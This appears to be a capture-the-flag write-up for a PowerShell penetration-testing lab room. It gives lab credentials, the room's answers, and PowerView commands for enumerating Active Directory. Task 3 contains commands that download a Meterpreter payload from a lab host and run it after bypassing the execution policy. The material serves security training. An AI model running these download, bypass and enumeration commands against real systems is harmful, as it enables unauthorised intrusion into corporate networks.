Powershell for Pentesters
This room covers the principle uses of PowerShell in Penetration Tests. Interacting with files, scanning the network and system enumeration are covered.
This room can be found here. This section will cover the basics of PowerShell that will be useful in any engagement.
Target machine SSH credentials:
Username: walter
Password: Kowacs123!
We can then run powershell
to access PowerShell.
Task 1
Most of the command-line portions of pentest training focus on using Linux, but most corporate systems are Windows. So it is important that the Red Team member feels at home in both operating systems.
There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang, the downside to these and other scripts are they are detected by most AV (antivirus) software.
Question 1: What useful PowerShell script did you find on Walter's desktop?
powerview.ps1
- dir
on Walters desktop to see the files
Task 2
Start-Process
- Used to start a process, such as notepad.
Get-Process
- Lists all running processes. Can also be used with the -name
parameter to filter for a specific process
(command) | Export-Csv
- Exports the Previously piped command into a .CSV file that may be easier to read.
Get-Content
- Shows the contents of a file. Similar to the cat
command on linux.
Copy-Item
- Copies and item
Move-Item
- Moves and item
Get-FileHash
- Obtains file hash of specified file
Question 1: What is the MD5 hash value of the file on Walter's desktop?
501570FFBA7FACE69D61DA1A0843E89A
- Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1
will give us the
Task 3
Downloading files
There are multiple ways to download files from a server using PowerShell. One of the quickest ways is using WebClient
and DownloadFile
.
(New-Object System.Net.WebClient)DownloadFile('URL/File', 'Output-File')
Example:
(New-Object System.Net.WebClient)DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')
This will connect to the host 10.0.2.8 and download themeterpreter-64.ps1
file. The file is then saved as βmeterpreter.ps1
β
Another method is by using Invoke-WebRequest
Invoke-WebRequest "URL/File" -OutFile "File"
Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -Outfile "meterpreter.ps1"
Execution Policies
Once we have the file downloaded, we can run the file, but we may run into an ExecutionPolicy
issue. Microsoft has stated ExecutionPolicy is NOT a security feature. but it functions as an added safety measure and can be bypassed by the user.
The current state of the ExecutionPolicy configuration can be seen using βGet-ExecutionPolicy -list
β
Execution policies can have seven different values:
AllSigned
- Scripts can run but require all scripts to be signed by a trusted publisher.Bypass
- All scripts can run, and no warnings or prompts will be displayed.Default
- This refers to βrestrictedβ for Windows clients and βRemoteSignedβ for Windows servers.RemoteSigned
- Scripts can run, and this does not require local scripts to be digitally signed.Restricted
- The default configuration for Windows clients. Allows individual commands to run, does not allow scripts.Undefined
- This shows that no specific execution policy was set. This means default execution policies will be enforced.Unrestricted
- Most scripts will run.
We several alternatives to bypass the ExecutionPolicy, but some methods require the user to have administrator account privileges. The most common way is:
powershell -ExecutionPolicy Bypass -File .\(File)
Example:
powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1
powershell -Exec Bypass -File .\(File)
Example:
powershell -Exec Bypass -File .\meterpreter.ps1
We can also change the ExecutionPolicy for processes using Set-ExecutionPolicy Bypass -Scope Process
then attempt to run the file.
Task 4
Get-Hotfix
- Enumerate already installed patchesGet-Hotfix | Format-list | findstr InstalledOn
Get-Hotfix | Format-Table HotFixID
Format-List
- Used to gather more information about objectsdir | Format-List
Out-File
- Used to save the output to a file for further useGet-Hotfix | Out-File Hotfixes.txt
Question 1: What Windows Security Update was installed on 5/15/2019?
KB4499728
- Get-HotFix
can give us our answer
Task 6
PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from here.
Once we download the file, we will need to bypass the execution policy, then import the module.
powershell -Exec Bypass .\powerview.ps1
Import-Module .\powerview.ps1
With powerview imported we can use it to obtain information on Domain Configuration and users.
Get-NetDomainController
- Collect information on the domain controllerGet-NetUser
- Provide a list of domain users. Depending on the size of the company, we may want to output this to a .csvGet-NetUser | select -ExpandProperty lastlogon
can be used to expand on this command to view the users last logon date/time
Get-NetComputer
- Enumerate systems connected to the domainGet-NetGroup
- Enumerate Existing GroupsGet-NetGroupMemer "Domain Admins"
can be used to find group members in the "Domain Admins" group.
Find-DomainShare
- Lists available sharesGet-NetGPO
- Gather information on enforced policies through Group Policy.Find-LocalAdminAccess
- List systems in the domain you may access as a local administrator
Question 1: One of the accounts has a special description, what is it?
IDF-17828290
- Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol
can give us details. We can ofcourse add additional properties if we find fit.
Question 2: How many accounts are disabled?
4
- Seeing previous screenshot/command we can find our answer.
Question 3: How many users are in the "domain admins" group?
3
- Get-NetGroupMember "Domain Admins"
can give us our answer
Question 4: Which users are in the "domain admins" group?
usand, ssilk, ServerAdmin
- Previous command and screenshot give us our answer.
Question 5: List shares, what is the name of the "interesting" share?
operationfiles
- Find-DomainShare -CheckShareAccess
, most of these look pretty normal except this one.
Question 6: What is the name of the user-created Group Policy?
Disable WinDef
- Running Get-NetGPO -properties displayname
we see the list of Group Policy display names
Question 7: What are the first names of users' whose accounts were disabled?
Daniel, Ursula
-Looking at our previous command, Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol
, we can see the first and last name of the users and can see which one are disabled.
Last updated